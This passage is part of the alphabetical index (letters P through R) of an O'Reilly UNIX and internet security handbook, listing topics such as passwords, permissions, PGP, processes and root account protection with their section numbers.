root : (see root directory)<br />

pass phrases : (see passwords)<br />

pass phrases for PGP<br />

6.6.3.1. Encrypting files with IDEA<br />

(see also passwords)<br />

passive FTP<br />

17.3.2.2. Passive vs. active FTP<br />

17.3.2.3. FTP passive mode<br />

passwd command<br />

3.4. Changing Your Password<br />

8.6.2. What Is Salt?<br />

as SUID program : 5.5. SUID<br />

-l option<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (1 of 14) [2002-04-12 10:43:53]


Index<br />

8.4.1. Changing an Account's Password<br />

8.8.8. Disabling an Account by Changing Its Password<br />

-n option : 8.8.6. Password Aging and Expiration<br />

-x option : 8.8.6. Password Aging and Expiration<br />

-f nomemory option : 3.5. Verifying Your New Password<br />

using as superuser : 3.5. Verifying Your New Password<br />

passwd file<br />

1.2. What Is an Operating System?<br />

3.2.1. The /etc/passwd File<br />

3.2.2. The /etc/passwd File and Network Databases<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

7.1.2. What Should You Back Up?<br />

8.1.1. Accounts Without Passwords<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

15.1.4. How the UUCP Commands Work<br />

24.4.1. New Accounts<br />

C.5.1. Process #1: /etc/init<br />

(see /etc/passwd file)<br />

Passwd table (NIS+) : 19.5.3. NIS+ Tables<br />

passwd+ package<br />

8.8.2. Constraining Passwords<br />

8.8.4. Password Generators<br />

password coach : 8.8.4. Password Generators<br />

password file : 19.4.4.6. NIS is confused about "+"<br />

password modems : 14.6. Additional <strong>Sec</strong>urity for Modems<br />

password.adjunct file : 8.8.5. Shadow Password Files<br />

passwords<br />

3.2. Passwords<br />

3.6.1. Bad Passwords: Open Doors<br />

3.8. Summary<br />

23.5. Tips on Using Passwords<br />

accounts without : 8.1.1. Accounts Without Passwords<br />

assigning to users : 8.8.1. Assigning Passwords to Users<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (2 of 14) [2002-04-12 10:43:53]


Index<br />

avoiding conventional<br />

8.8. Administrative Techniques for Conventional Passwords<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

bad choices for<br />

3.6.1. Bad Passwords: Open Doors<br />

3.6.4. Passwords on Multiple Machines<br />

changing<br />

3.4. Changing Your Password<br />

3.5. Verifying Your New Password<br />

8.4.1. Changing an Account's Password<br />

8.8.8. Disabling an Account by Changing Its Password<br />

checklist for : A.1.1.2. Chapter 3: Users and Passwords<br />

constraining : 8.8.2. Constraining Passwords<br />

conventional : 3.2.6. Conventional <strong>UNIX</strong> Passwords<br />

cracking<br />

8.6.1. The crypt() Algorithm<br />

8.8.3. Cracking Your Own Passwords<br />

8.8.3.2. The dilemma of password crackers<br />

17.3.3. TELNET (TCP Port 23)<br />

encrypting<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

8.6.4. Crypt16() and Other Algorithms<br />

expiring : 8.8.6. Password Aging and Expiration<br />

federal jurisdiction over : 26.2.2. Federal Jurisdiction<br />

FTP and : 17.3.2. (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

generators of : 8.8.4. Password Generators<br />

hit lists of : 3.6.1. Bad Passwords: Open Doors<br />

Kerberos : 19.6.5. Kerberos Limitations<br />

logging changes to : 10.7.2.1. Exception and activity reports<br />

logging failed attempts at : 10.5.3. syslog Messages<br />

for MUDs : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

on multiple machines<br />

3.6.4. Passwords on Multiple Machines<br />

3.6.5. Writing Down Passwords<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (3 of 14) [2002-04-12 10:43:53]


Index<br />

over network connections : 23.3. Tips on Writing Network Programs<br />

with network services : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

NIS, with <strong>Sec</strong>ure RPC : 19.3.2.1. Creating passwords for users<br />

NIS+, changing : 19.5.4.1. Changing your password<br />

one-time<br />

3.7. One-Time Passwords<br />

8.7. One-Time Passwords<br />

8.7.3. Code Books<br />

17.4. <strong>Sec</strong>urity Implications of Network Services<br />

with POP : 17.3.10. Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

required for Web use<br />

18.3.2. Commands Within the Block<br />

18.3.3. Setting Up Web Users and Passwords<br />

shadow<br />

8.4.1. Changing an Account's Password<br />

8.8.5. Shadow Password Files<br />

sniffing<br />

1.4.3. Add-On Functionality Breeds Problems<br />

3. Users and Passwords<br />

8.7. One-Time Passwords<br />

system clock and : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

token cards with : 8.7.2. Token Cards<br />

unique, number of : 3.6.3. Good Passwords: Locked Doors<br />

usernames as : 8.8.3.1. Joetest: a simple password cracker<br />

UUCP accounts : 15.3.2. Establishing UUCP Passwords<br />

verifying new : 3.5. Verifying Your New Password<br />

wizard's (sendmail) : 17.3.4.1. sendmail and security<br />

writing down : 3.6.5. Writing Down Passwords<br />

patches, logging : 10.7.2.2. Informational material<br />

patents : 26.4.4. Patent Concerns<br />

and cryptography : 6.7.1. Cryptography and the U.S. Patent System<br />

PATH variable<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (4 of 14) [2002-04-12 10:43:53]


Index<br />

23.4. Tips on Writing SUID/SGID Programs<br />

attacks via : 11.5.1.1. PATH attacks<br />

pathnames : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

paths : 5.1.3. Current Directory and Paths<br />

trusted : 8.5.3.1. Trusted path<br />

pax program : 7.4.2. Simple Archives<br />

PCERT (Purdue University) : F.3.4.30. Purdue University<br />

PCs<br />

viruses on : 11.1.5. Viruses<br />

web server on : 18.2. Running a <strong>Sec</strong>ure Server<br />

PDP-11 processors<br />

1.3. History of <strong>UNIX</strong><br />

8.6.1. The crypt() Algorithm<br />

Penn State response team : F.3.4.29. Pennsylvania State University<br />

per-machine logs : 10.7.2. Per-Machine Logs<br />

per-site logs : 10.7.1. Per-Site Logs<br />

performance<br />

compromised<br />

25.2.1. Process-Overload Problems<br />

25.2.1.2. System overload attacks<br />

reviews : 13.2.3. Performance Reviews and Monitoring<br />

with <strong>Sec</strong>ure RPC : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

using FFS : 25.2.2.6. Reserved space<br />

perimeter, security : 12.1.1. The Physical <strong>Sec</strong>urity Plan<br />

perl command<br />

-T option<br />

18.2.3.4. Tainting with Perl<br />

23.4. Tips on Writing SUID/SGID Programs<br />

Perl programming language<br />

5.5.3. SUID Shell Scripts<br />

11.1.4. Trojan Horses<br />

11.5.1.2. IFS attacks<br />

random seed generator : 23.9. A Good Random Seed Generator<br />

script for reading lastlog file : 10.1.1. lastlog File<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (5 of 14) [2002-04-12 10:43:53]


Index<br />

Swatch program<br />

10.6. Swatch: A Log File Tool<br />

10.6.2. The Swatch Configuration File<br />

E.4.9. Swatch<br />

tainting facility : 18.2.3.4. Tainting with Perl<br />

permissions<br />

1.1. What Is Computer <strong>Sec</strong>urity?<br />

5.1.6. Understanding File Permissions<br />

5.2.4. Using Octal File Permissions<br />

11.1.5. Viruses<br />

11.6.1. File Protections<br />

11.6.1.3. World-readable backup devices<br />

access control lists (ACLs)<br />

5.2.5. Access Control Lists<br />

5.2.5.2. HP-UX access control lists<br />

changing<br />

5.2.1. chmod: Changing a File's Permissions<br />

5.2.4. Using Octal File Permissions<br />

directory : 5.4. Using Directory Permissions<br />

/etc/utmp file : 10.1.2. utmp and wtmp Files<br />

intruder's modifications to : 24.4.1.2. Changes in file and directory protections<br />

modem devices : 14.5.2. Setting Up the <strong>UNIX</strong> Device<br />

modem files : 14.5.1. Hooking Up a Modem to Your Computer<br />

of NIS+ objects : 19.5.5. NIS+ Limitations<br />

octal<br />

5.2.3. Calculating Octal File Permissions<br />

5.2.4. Using Octal File Permissions<br />

of .rhosts file : 17.3.18.4. The ~/.rhosts file<br />

SUID programs<br />

5.5. SUID<br />

5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

symbolic links and : 5.1.7. File Permissions in Detail<br />

umasks<br />

5.3. The umask<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (6 of 14) [2002-04-12 10:43:54]


Index<br />

5.3.2. Common umask Values<br />

UUCP : 15.4.1.4. Special permissions<br />

Permissions file<br />

15.5. <strong>Sec</strong>urity in BNU UUCP<br />

15.5.1. Permissions File<br />

15.5.3. uucheck: Checking Your Permissions File<br />

checking with uucheck : 15.5.3. uucheck: Checking Your Permissions File<br />

personnel : (see employees)<br />

PGP (Pretty Good Privacy)<br />

6.6.3. PGP: Pretty Good Privacy<br />

6.6.3.6. PGP detached signatures<br />

-eat and -seat options : 6.6.3.3. Encrypting a message<br />

encrypting message with : 6.6.3.3. Encrypting a message<br />

encrypting Web documents : 18.4.1. Eavesdropping Over the Wire<br />

-ka option : 6.6.3.2. Creating your PGP public key<br />

-kg option : 6.6.3.2. Creating your PGP public key<br />

-kvc option : 6.6.3.6. PGP detached signatures<br />

-kxaf option : 6.6.3.2. Creating your PGP public key<br />

-o option : 6.6.3.6. PGP detached signatures<br />

-sat option : 6.6.3.4. Adding a digital signature to an announcement<br />

-sb option : 6.6.3.6. PGP detached signatures<br />

software signature : E.4. Software Resources<br />

ph (phonebook) server : 17.3.8.3. Replacing finger<br />

phantom mail : 17.3.4.2. Using sendmail to receive email<br />

physical security<br />

12. Physical <strong>Sec</strong>urity<br />

12.4.2. "Nothing to Lose?"<br />

access control : 12.2.3. Physical Access<br />

of backups<br />

7.1.6. <strong>Sec</strong>urity for Backups<br />

7.1.6.3. Data security for backups<br />

checklist for : A.1.1.11. Chapter 12: Physical <strong>Sec</strong>urity<br />

modems<br />

14.5.4. Physical Protection of Modems<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (7 of 14) [2002-04-12 10:43:54]


Index<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

read-only filesystems : 9.1.2. Read-only Filesystems<br />

signal grounding : 25.3.3. Signal Grounding<br />

PIDs (process IDs)<br />

C.1.3.1. Process identification numbers (PID)<br />

C.1.3.4. Process groups and sessions<br />

Pieprzyk, Josef : 6.5.4.3. HAVAL<br />

PingWare program : 17.6.3. PingWare<br />

pipe (in Swatch program) : 10.6.2. The Swatch Configuration File<br />

pipes<br />

18.2.3.2. Testing is not enough!<br />

18.2.3.3. Sending mail<br />

pipes (for smoking) : 12.2.1.2. Smoke<br />

piracy of software<br />

26.4.2.1. Software piracy and the SPA<br />

(see also software)<br />

pirated software : (see software)<br />

plaintext attacks : 6.2.3. Cryptographic Strength<br />

.plan file : 17.3.8.1. The .plan and .project files<br />

platforms : (see operating systems)<br />

play accounts : (see open accounts)<br />

playback attacks : 19.6.1.2. Using the ticket granting ticket<br />

plus sign (+)<br />

in hosts.equiv file : 17.3.18.5. Searching for .rhosts files<br />

in NIS<br />

19.4. Sun's Network Information Service (NIS)<br />

19.4.4.6. NIS is confused about "+"<br />

Point-to-Point Protocol (PPP) : 14.5. Modems and <strong>UNIX</strong><br />

policy, security<br />

1.2. What Is an Operating System?<br />

2. Policies and Guidelines<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

A.1.1.1. Chapter 2: Policies and Guidelines<br />

cost-benefit analysis<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (8 of 14) [2002-04-12 10:43:54]


Index<br />

2.3. Cost-Benefit Analysis<br />

2.3.4. Convincing Management<br />

risk assessment<br />

2.2. Risk Assessment<br />

2.2.2. Review Your Risks<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

role of<br />

2.4.1. The Role of Policy<br />

politics : 11.3. Authors<br />

2.4.4. Some Key Ideas in Developing a Workable Policy<br />

2.4.4.7. Defend in depth<br />

polyalphabetic ciphers : 6.3. The Enigma Encryption System<br />

polygraph tests : 13.1. Background Checks<br />

POP (Post Office Protocol) : 17.3.10. Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

popen function<br />

18.2.3.2. Testing is not enough!<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

pornography : 26.4.5. Pornography and Indecent Material<br />

port numbers<br />

23.3. Tips on Writing Network Programs<br />

G. Table of IP Services<br />

portable computers : 12.2.6.3. Portables<br />

portable I/O library : 1.3. History of <strong>UNIX</strong><br />

portmap service<br />

19.2.1. Sun's portmap/rpcbind<br />

19.4.4.4. Spoofing RPC<br />

E.4.6. portmap<br />

portmapper program<br />

17.3.11. Sun RPC's portmapper (UDP and TCP Ports 111)<br />

ports<br />

19.2.1. Sun's portmap/rpcbind<br />

19.4.5. Unintended Disclosure of Site Information with NIS<br />

16.2.4.2. TCP<br />

17.1.1. The /etc/services File<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (9 of 14) [2002-04-12 10:43:54]


Index<br />

G. Table of IP Services<br />

trusted : (see trusted, ports)<br />

positivity : 2.4.4.2. Be positive<br />

POSIX<br />

1.3. History of <strong>UNIX</strong><br />

1.4.2. Software Quality<br />

C.1.3.4. Process groups and sessions<br />

chown command and : 5.7. chown: Changing a File's Owner<br />

Post Office Protocol : (see POP)<br />

postmaster, contacting : 24.2.4.2. How to contact the system administrator of a computer you don't know<br />

PostScript files : 11.1.5. Viruses<br />

power outages, logging : 10.7.1.1. Exception and activity reports<br />

power surges<br />

12.2. Protecting Computer Hardware<br />

12.2.1.8. Electrical noise<br />

(see also lightning)<br />

PPP (Point-to-Point Protocol)<br />

14.5. Modems and <strong>UNIX</strong><br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

preserve program : 5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

Pretty Good Privacy : (see PGP)<br />

prevention, cost of<br />

2.3. Cost-Benefit Analysis<br />

2.3.4. Convincing Management<br />

primary group : 4.1.3. Groups and Group Identifiers (GIDs)<br />

principals, NIS+ : 19.5.1. What NIS+ Does<br />

print through process : 12.3.2.1. Verify your backups<br />

printers<br />

buffers : 12.3.4.1. Printer buffers<br />

/etc/hosts.lpd file : 17.3.18.6. /etc/hosts.lpd file<br />

logging to : 10.5.2.1. Logging to a printer<br />

output from : 12.3.4.2. Printer output<br />

ports for : 12.3.1.4. Auxiliary ports on terminals<br />

priority of processes : C.1.3.3. Process priority and niceness<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (10 of 14) [2002-04-12 10:43:54]


Index<br />

privacy<br />

2.1. Planning Your <strong>Sec</strong>urity Needs<br />

2.5.2. Confidential Information<br />

9. Integrity Management<br />

12.3. Protecting Data<br />

12.3.6. Key Switches<br />

(see also encryption; integrity)<br />

Electronic Communications Privacy Act (ECPA) : 26.2.3. Federal Computer Crime Laws<br />

<strong>Sec</strong>ure RPC : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

private-key cryptography<br />

6.4. Common Cryptographic Algorithms<br />

6.4.1. Summary of Private Key Systems<br />

privilege testing (modem) : 14.5.3.3. Privilege testing<br />

privileges, file : (see permissions)<br />

privileges, SUID : (see SUID/SGID programs)<br />

processes<br />

C.1. About Processes<br />

C.5.3. Running the User's Shell<br />

accounting<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.3. messages Log File<br />

group IDs<br />

4.3.3. Other IDs<br />

C.1.3.4. Process groups and sessions<br />

overload attacks<br />

25.2.1. Process-Overload Problems<br />

25.2.1.2. System overload attacks<br />

priority of : C.1.3.3. Process priority and niceness<br />

scheduler : C.1.3.3. Process priority and niceness<br />

procmail system : 11.5.2.5. .forward, .procmailrc<br />

.procmailrc file : 11.5.2.5. .forward, .procmailrc<br />

.profile file<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (11 of 14) [2002-04-12 10:43:54]


Index<br />

11.5.2.1. .login, .profile, /etc/profile<br />

24.4.1.6. Changes to startup files<br />

programmed threats<br />

11. Protecting Against Programmed Threats<br />

11.6.2. Shared Libraries<br />

authors of : 11.3. Authors<br />

checklist for : A.1.1.10. Chapter 11: Protecting Against Programmed Threats<br />

protection from : 11.5. Protecting Yourself<br />

references on : D.1.4. Computer Viruses and Programmed Threats<br />

programming : 23. Writing <strong>Sec</strong>ure SUID and Network Programs<br />

references for : D.1.11. <strong>UNIX</strong> Programming and System Administration<br />

programs<br />

CGI : (see CGI, scripts)<br />

integrity of : (see integrity, data)<br />

for network services : 23.3. Tips on Writing Network Programs<br />

rabbit<br />

11.1. Programmed Threats: Definitions<br />

11.1.7. Bacteria and Rabbits<br />

running simultaneously : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

secure : 23. Writing <strong>Sec</strong>ure SUID and Network Programs<br />

worms : 11.1.6. Worms<br />

Project Athena : (see Kerberos system)<br />

.project file : 17.3.8.1. The .plan and .project files<br />

proprietary ownership notices : 26.2.6. Other Tips<br />

prosecution, criminal<br />

26.2. Criminal Prosecution<br />

26.2.7. A Final Note on Criminal Actions<br />

protocols<br />

16.2.4. Packets and Protocols<br />

(see also under specific protocol)<br />

IP : (see IP protocols)<br />

Protocols table (NIS+) : 19.5.3. NIS+ Tables<br />

proxies, checklist for : A.1.1.21. Chapter 22: Wrappers and Proxies<br />

pruning the wtmp file : 10.1.3.1. Pruning the wtmp file<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (12 of 14) [2002-04-12 10:43:54]


Index<br />

ps command<br />

6.6.2. des: The Data Encryption Standard<br />

10.1.2. utmp and wtmp Files<br />

19.3.2.3. Making sure <strong>Sec</strong>ure RPC programs are running on every workstation<br />

24.2.1. Catching One in the Act<br />

C.1.2. The ps Command<br />

C.1.2.2. Listing processes with Berkeley-derived versions of <strong>UNIX</strong><br />

with kill command : 24.2.5. Getting Rid of the Intruder<br />

to stop process overload<br />

25.2.1.1. Too many processes<br />

25.2.1.2. System overload attacks<br />

pseudo-devices : 5.6. Device Files<br />

pseudorandom functions : 23.6. Tips on Generating Random Numbers<br />

PUBDIR= command : 15.5.2. Permissions Commands<br />

public-key cryptography<br />

6.4. Common Cryptographic Algorithms<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

6.5.3. Digital Signatures<br />

18.3. Controlling Access to Files on Your Server<br />

18.6. Dependence on Third Parties<br />

breaking : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

PGP : 6.6.3.2. Creating your PGP public key<br />

proving identity with : 19.3.1.1. Proving your identity<br />

publicity hounds : 11.3. Authors<br />

publicizing security holes : 2.5.1. Going Public<br />

publickey file : 19.3.2.1. Creating passwords for users<br />

Purdue University (PCERT) : F.3.4.30. Purdue University<br />

Purify : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

pwck command : 8.2. Monitoring File Format<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (13 of 14) [2002-04-12 10:43:54]


Index<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_p.htm (14 of 14) [2002-04-12 10:43:54]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: Q<br />

quality of software<br />

1.4.2. Software Quality<br />

1.4.3. Add-On Functionality Breeds Problems<br />

quantifying threats : 2.2.1.3. Quantifying the threats<br />

quot command : 25.2.2.2. quot command<br />

quotacheck -a command : 25.2.2.5. Using quotas<br />

quotas : 25.2.2.5. Using quotas<br />

on /tmp directory : 25.2.4. /tmp Problems<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_q.htm [2002-04-12 10:43:54]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: R<br />

rabbit programs<br />

11.1. Programmed Threats: Definitions<br />

11.1.7. Bacteria and Rabbits<br />

race conditions : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

radio<br />

eavesdropping : 12.3.1.3. Eavesdropping by radio and using TEMPEST<br />

transmissions : 14.4.4.1. Kinds of eavesdropping<br />

transmitters : 12.2.1.8. Electrical noise<br />

rain : (see water)<br />

RAM theft : 12.2.6. Preventing Theft<br />

rand function : 23.7.1. rand ( )<br />

random device : 23.7.4. Other random number generators<br />

random function : 23.7.2. random ( )<br />

random numbers : 23.6. Tips on Generating Random Numbers<br />

raw devices : 5.6. Device Files<br />

rc directory : C.5.1. Process #1: /etc/init<br />

RC2, RC4, and RC5 algorithms<br />

6.4.1. Summary of Private Key Systems<br />

6.4.8. Proprietary Encryption Systems<br />

RC4 and RC5 algorithms : 6.4.1. Summary of Private Key Systems<br />

rcp command<br />

1.4.3. Add-On Functionality Breeds Problems<br />

7.4.5. Backups Across the Net<br />

RCS (Revision Control System)<br />

7.3.2. Building an Automatic Backup System<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

rdist program<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_r.htm (1 of 7) [2002-04-12 10:43:55]


Index<br />

7.4.5. Backups Across the Net<br />

9.2.1.3. rdist<br />

rdump/rrestore program : 7.4.5. Backups Across the Net<br />

read permission<br />

5.1.7. File Permissions in Detail<br />

5.4. Using Directory Permissions<br />

read system call : 5.1.7. File Permissions in Detail<br />

time-outs on : 23.3. Tips on Writing Network Programs<br />

read-only exporting filesystems : 11.6.1.2. Writable system files and directories<br />

read-only filesystems : 9.1.2. Read-only Filesystems<br />

READ= command : 15.5.2. Permissions Commands<br />

readdir library call : 5.4. Using Directory Permissions<br />

real UIDs/GIDs<br />

4.3.1. Real and Effective UIDs<br />

C.1.3.2. Process real and effective UID<br />

realpath function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

reauthentication<br />

Kerberos : 19.6.4. Using Kerberos<br />

<strong>Sec</strong>ure RPC : 19.3.1.3. Setting the window<br />

Receive Data (RD) : 14.3. The RS-232 Serial Protocol<br />

Redman, Brian E. : 15.2. Versions of UUCP<br />

refer_log file : 18.4.2. Eavesdropping Through Log Files<br />

reflectors (in Enigma system) : 6.3. The Enigma Encryption System<br />

reformatting attack : 25.1. Destructive Attacks<br />

relative humidity : 12.2.1.11. Humidity<br />

relative pathnames : 5.1.3. Current Directory and Paths<br />

remote<br />

command execution<br />

15.1.2. uux Command<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

17.3.17. rexec (TCP Port 512)<br />

comparison copies : 9.2.1.2. Remote copies<br />

computers<br />

transferring files to : 15.1.1. uucp Command<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_r.htm (2 of 7) [2002-04-12 10:43:55]


Index<br />

file access (UUCP)<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

network filesystems : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

procedure calls : (see RPCs)<br />

remote file<br />

10.3.1. aculog File<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

remote.unknown file : 15.5. <strong>Sec</strong>urity in BNU UUCP<br />

renice command<br />

25.2.1.2. System overload attacks<br />

C.1.3.3. Process priority and niceness<br />

replay attacks<br />

17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

19.6.1.2. Using the ticket granting ticket<br />

reporting security holes : 2.5.1. Going Public<br />

Request to Send (RTS) : 14.3. The RS-232 Serial Protocol<br />

REQUEST= command<br />

15.5.1.3. A Sample Permissions file<br />

15.5.2. Permissions Commands<br />

reserved memory space : 25.2.2.6. Reserved space<br />

resolution, time : 23.8. Picking a Random Seed<br />

resolver library (bind) : 16.2.6.1. DNS under <strong>UNIX</strong><br />

resolving (DNS) : 17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

response teams<br />

27.3.5. Response Personnel?<br />

F.3. Emergency Response Organizations<br />

F.3.4.46. Westinghouse Electric Corporation<br />

mailing lists for : E.1.1. Response Teams and Vendors<br />

restore : (see dump/restore program)<br />

restricted<br />

filesystems<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_r.htm (3 of 7) [2002-04-12 10:43:55]


Index<br />

FTP : 17.3.2.5. Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

logins : 8.3. Restricting Logins<br />

shells<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

su use : 4.3.6. Restricting su<br />

restrictmailq (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

retention of backups<br />

7.1.5. How Long Should You Keep a Backup?<br />

7.2.2.2. Retention schedule<br />

(see also networks, backing up)<br />

return calls : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

reverse lookup<br />

16.3.2. <strong>Sec</strong>urity and Nameservice<br />

23.3. Tips on Writing Network Programs<br />

Revision Control System (RCS)<br />

7.3.2. Building an Automatic Backup System<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

revocation certificate : 6.6.3.2. Creating your PGP public key<br />

rexd service : 19.2.2.4. AUTH_KERB<br />

rexec service : 17.3.17. rexec (TCP Port 512)<br />

RFC 1750 : 23.8. Picking a Random Seed<br />

.rhosts file<br />

10.4.3. Network Setup<br />

17.3.18.4. The ~/.rhosts file<br />

17.3.18.5. Searching for .rhosts files<br />

back door in : 11.1.2. Back Doors and Trap Doors<br />

intruder's changes to : 24.4.1.4. Changes in .rhosts files<br />

searching for : 17.3.18.5. Searching for .rhosts files<br />

Ring Indicator (RI) : 14.3. The RS-232 Serial Protocol<br />

RIP (Routing <strong>Internet</strong> Protocol) : 17.3.19. Routing <strong>Internet</strong> Protocol (RIP routed) (UDP Port 520)<br />

risk assessment<br />

2.2. Risk Assessment<br />

2.2.2. Review Your Risks<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_r.htm (4 of 7) [2002-04-12 10:43:55]


Index<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

risks : (see threats)<br />

Ritchie, Dennis : 1.3. History of <strong>UNIX</strong><br />

Rivest, Ronald L.<br />

6.1.3. Modern Controversy<br />

6.4.1. Summary of Private Key Systems<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.5.4.1. MD2, MD4, and MD5<br />

RJE (Remote Job Entry) : 3.2.1. The /etc/passwd File<br />

rlogin command<br />

1.4.3. Add-On Functionality Breeds Problems<br />

3.5. Verifying Your New Password<br />

16.3.2. <strong>Sec</strong>urity and Nameservice<br />

17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

17.3.18.6. /etc/hosts.lpd file<br />

versus Telnet : 17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

rlogind command : 17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

rm command<br />

5.4. Using Directory Permissions<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

and deep tree structures : 25.2.2.8. Tree-structure attacks<br />

rmail program : 15.4.3. L.cmds: Providing Remote Command Execution<br />

root account<br />

4. Users, Groups, and the Superuser<br />

4.1. Users and Groups<br />

4.2.1. The Superuser<br />

4.2.1.5. The problem with the superuser<br />

5.5.2. Problems with SUID<br />

(see also superuser)<br />

abilities of : 27.1.3. What the Superuser Can and Cannot Do<br />

chroot<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_r.htm (5 of 7) [2002-04-12 10:43:55]


Index<br />

immutable files and : 9.1.1. Immutable and Append-Only Files<br />

network services with : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

protecting<br />

8.5. Protecting the root Account<br />

8.5.3.2. Trusted computing base<br />

on remote machine, fingering : 24.2.4.2. How to contact the system administrator of a computer<br />

you don't know<br />

single-command accounts and : 8.1.3. Accounts That Run a Single Command<br />

web server as : 18.2.1. The Server's UID<br />

root directory : 5.1.1. Directories<br />

backups of : 7.1.3. Types of Backups<br />

